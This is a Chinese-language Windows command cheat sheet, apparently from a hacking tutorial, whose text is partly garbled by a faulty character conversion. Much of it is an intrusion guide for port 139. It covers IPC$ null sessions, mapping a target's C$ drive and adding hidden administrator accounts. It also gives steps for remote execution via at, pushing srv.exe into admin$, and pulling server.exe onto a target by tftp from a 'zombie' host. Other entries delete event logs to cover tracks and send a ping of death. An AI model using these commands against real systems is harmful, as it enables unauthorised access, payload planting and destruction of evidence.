天天看點

net use使用方法

建立到遠端主機的連接配接

net use \\ip\ipc$ "password" /user:"username"

建立新使用者

net user username password /add

修改使用者密碼

net user username newpassword

激活使用者

net user username /active:yes

把使用者加入到使用者組

net localgroup groupname username /add

檢視遠端主機的時間

net time \\ip

顯示遠端主機的共享資源清單

net view \\ip

啟動和停止系統服務

net start(stop) servicename

映射對方的硬碟

net use z: \\ip\c$

啟動程式

at \\ip time programnane

檔案複制

copy filename \\ip\c$\filename

遠端執行FTP指令

echo open servername > c:\ftp.txt

echo username >> c:\ftp.txt

echo password >> c:\ftp.txt

echo get filename c:\filename >> c:\ftp.txt

ftp -s:c:\ftp.txt

del c:\ftp.txt

删除日志

del c:\winnt\system32\logfiles\*.*

del c:\winnt\ssytem32\config\*.evt

del c:\winnt\system32\dtclog\*.*

del c:\winnt\system32\*.log

del c:\winnt\system32\*.txt

del c:\winnt\*.txt

del c:\winnt\*.log

通路對方共享資源

net use \\192.168.1.1\c$ /user:administrator "123"

如果提示連接配接成功,你在輸入

start \\192.168.1.1\c$

就打開目标機的C槽了

----------------------------------

net use \\ip\ipc$ " " /user:" " 建立IPC空連結

net use \\ip\ipc$ "密碼" /user:"使用者名" 建立IPC非空連結

net use h: \\ip\c$ "密碼" /user:"使用者名" 直接登陸後映射對方C:到本地為H:

net use h: \\ip\c$ 登陸後映射對方C:到本地為H:

net use \\ip\ipc$ /del 删除IPC連結

net use h: /del 删除映射對方到本地的為H:的映射

net user 使用者名 密碼 /add 建立使用者

net user guest /active:yes 激活guest使用者

net user 檢視有哪些使用者

net user 帳戶名 檢視帳戶的屬性

net localgroup administrators 使用者名 /add 把“使用者”添加到管理者中使其具有管理者權限,注意:administrator後加s用複數

net start 檢視開啟了哪些服務

net start 服務名  開啟服務;(如:net start telnet, net start schedule)

net stop 服務名 停止某服務

net time \\目标ip 檢視對方時間

net time \\目标ip /set 設定本地計算機時間與“目标IP”主機的時間同步,加上參數/yes可取消确認資訊

net view 檢視本地區域網路内開啟了哪些共享

net view \\ip 檢視對方區域網路内開啟了哪些共享

net config 顯示系統網絡設定

net logoff 斷開連接配接的共享

net pause 服務名 暫停某服務

net send ip "文本資訊" 向對方發資訊

net ver 區域網路内正在使用的網絡連接配接類型和資訊

net share 檢視本地開啟的共享

net share ipc$ 開啟ipc$共享

net share ipc$ /del 删除ipc$共享

net share c$ /del 删除C:共享

net user guest 12345 用guest使用者登陸後用将密碼改為12345

net password 密碼 更改系統登陸密碼

netstat -a 檢視開啟了哪些端口,常用netstat -an

netstat -n 檢視端口的網絡連接配接情況,常用netstat -an

netstat -v 檢視正在進行的工作

netstat -p 協定名 例:netstat -p tcq/ip 檢視某協定使用情況(檢視tcp/ip協定使用情況)

netstat -s 檢視正在使用的所有協定使用情況

nbtstat -A ip 對方136到139其中一個端口開了的話,就可檢視對方最近登陸的使用者名(03前的為使用者名)-注意:參數-A要大寫

tracert -參數 ip(或計算機名) 跟蹤路由(資料包),參數:“-w數字”用于設定逾時間隔。

ping ip(或域名) 向對方主機發送預設大小為32位元組的資料,參數:“-l[空格]資料包大小”;“-n發送資料次數”;“-t”指一直ping。

ping -t -l 65550 ip 死亡之ping(發送大于64K的檔案并一直ping就成了死亡之ping)

ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)檢視本地ip位址,ipconfig可用參數“/all”顯示全部配置資訊

tlist -t 以樹行清單顯示程序(為系統的附加工具,預設是沒有安裝的,在安裝目錄的Support/tools檔案夾内)

kill -F 程序名 加-F參數後強制結束某程序(為系統的附加工具,預設是沒有安裝的,在安裝目錄的Support/tools檔案夾内)

del -F 檔案名 加-F參數後就可删除隻讀檔案,/AR、/AH、/AS、/AA分别表示删除隻讀、隐藏、系統、存檔檔案,/A-R、/A-H、/A-S、/A-A表示删除除隻讀、隐藏、系統、存檔以外的檔案。例如“DEL/AR *.*”表示删除目前目錄下所有隻讀檔案,“DEL/A-S *.*”表示删除目前目錄下除系統檔案以外的所有檔案

#2 二:

del /S /Q 目錄 或用:rmdir /s /Q 目錄 /S删除目錄及目錄下的所有子目錄和檔案。同時使用參數/Q 可取消删除操作時的系統确認就直接删除。(二個指令作用相同)

move 盤符\路徑\要移動的檔案名 存放移動檔案的路徑\移動後檔案名 移動檔案,用參數/y将取消确認移動目錄存在相同檔案的提示就直接覆寫

fc one.txt two.txt > 3st.txt 對比二個檔案并把不同之處輸出到3st.txt檔案中,"> "和"> >" 是重定向指令

at id号 開啟已注冊的某個計劃任務

at /delete 停止所有計劃任務,用參數/yes則不需要确認就直接停止

at id号 /delete 停止某個已注冊的計劃任務

at 檢視所有的計劃任務

at \\ip time 程式名(或一個指令) /r 在某時間運作對方某程式并重新啟動計算機

finger username @host 檢視最近有哪些使用者登陸

telnet ip 端口 遠和登陸伺服器,預設端口為23

open ip 連接配接到IP(屬telnet登陸後的指令)

telnet 在本機上直接鍵入telnet 将進入本機的telnet

copy 路徑\檔案名1 路徑\檔案名2 /y 複制檔案1到指定的目錄為檔案2,用參數/y就同時取消确認你要改寫一份現存目錄檔案

copy c:\srv.exe \\ip\admin$ 複制本地c:\srv.exe到對方的admin下

cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的檔案,注:2st.txt檔案頭要空三排,參數:/b指二進制檔案,/a指ASCLL格式檔案

copy \\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 複制對方admini$共享下的srv.exe檔案(所有檔案)至本地C:

xcopy 要複制的檔案或目錄樹 目标位址\目錄名 複制檔案和目錄樹,用參數/Y将不提示覆寫相同檔案

tftp -i 自己IP(用肉機作跳闆時這用肉機IP) get server.exe c:\server.exe 登陸後,将“IP”的server.exe下載下傳到目标主機c:\server.exe 參數:-i指以二進制模式傳送,如傳送exe檔案時用,如不加-i 則以ASCII模式(傳送文本檔案模式)進行傳送

tftp -i 對方IP put c:\server.exe 登陸後,上傳本地c:\server.exe至主機

ftp ip 端口 用于上傳檔案至伺服器或進行檔案操作,預設端口為21。bin指用二進制方式傳送(可執行檔案進);預設為ASCII格式傳送(文本檔案時)

route print 顯示出IP路由,将主要顯示網絡位址Network addres,子網路遮罩Netmask,網關位址Gateway addres,接口位址Interface

arp 檢視和處理ARP緩存,ARP是名字解析的意思,負責把一個IP解析成一個實體性的MAC位址。arp -a将顯示出全部資訊

start 程式名或指令 /max 或/min 新開一個新視窗并最大化(最小化)運作某程式或指令

mem 檢視cpu使用情況

attrib 檔案名(目錄名) 檢視某檔案(目錄)的屬性

attrib 檔案名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某檔案的 存檔,隻讀,系統,隐藏 屬性;用+則是添加為某屬性

dir 檢視檔案,參數:/Q顯示檔案及目錄屬系統哪個使用者,/T:C顯示檔案建立時間,/T:A顯示檔案上次被通路時間,/T:W上次被修改時間

date /t 、 time /t 使用此參數即“DATE/T”、“TIME/T”将隻顯示目前日期和時間,而不必輸入新日期和時間

set 指定環境變量名稱=要指派給變量的字元 設定環境變量

set 顯示目前所有的環境變量

set p(或其它字元) 顯示出目前以字元p(或其它字元)開頭的所有環境變量

pause 暫停批處理程式,并顯示出:請按任意鍵繼續....

if 在批處理程式中執行條件處理(更多說明見if指令及變量)

goto 标簽 将cmd.exe導向到批處理程式中帶标簽的行(标簽必須單獨一行,且以冒号打頭,例如:“:start”标簽)

call 路徑\批處理檔案名 從批處理程式中調用另一個批處理程式 (更多說明見call /?)

for 對一組檔案中的每一個檔案執行某個特定指令(更多說明見for指令及變量)

echo on或off 打開或關閉echo,僅用echo不加參數則顯示目前echo設定

echo 資訊 在螢幕上顯示出資訊

echo 資訊 >> pass.txt 将"資訊"儲存到pass.txt檔案中

findstr "Hello" aa.txt 在aa.txt檔案中尋找字元串hello

find 檔案名 查找某檔案

title 标題名字 更改CMD視窗标題名字

color 顔色值 設定cmd控制台前景和背景顔色;0=黑、1=藍、2=綠、3=淺綠、4=紅、5=紫、6=黃、7=白、8=灰、9=淡藍、A=淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白

prompt 名稱 更改cmd.exe的顯示的指令提示符(把C:\、D:\統一改為:EntSky\ )

  139端口入侵

  net 指令是139端口入侵的重中之重,整個入侵過程會多次用到它。在指令行視窗下輸入net,可以看到有一大堆參數,别被這一大堆參數吓懷了,現在我來為你一一講解。

    net use

net use 指令用于與遠端主機建立IPC$(管理)連接配接,當你有遠端計算機的使用者名(通常使用者名為administrator,記住它)和密碼時,在指令行視窗下輸入net use\\IP\IPC$"password"/user:administrator,你就成功地建立了與遠端計算機的連接配接。在這之後,可以對其進行管理了。net use 還有一個用處,即映射遠端機器的共享資源,輸入net use z: \\IP\C$ (注意!在此之後的一切指令都是基于第一個指令的,也就是說必須先建立IPC$連接配接後,這些指令才會成功),打開“我的電腦”,你會發現多了一個Z盤,裡面全是遠端主機C槽下的東西,你在Z盤裡删除了一個檔案,對方C槽下的這個檔案就也被删除了,所有對Z盤的操作其實就是對遠端計算機的C 盤的操作。

繼續閱讀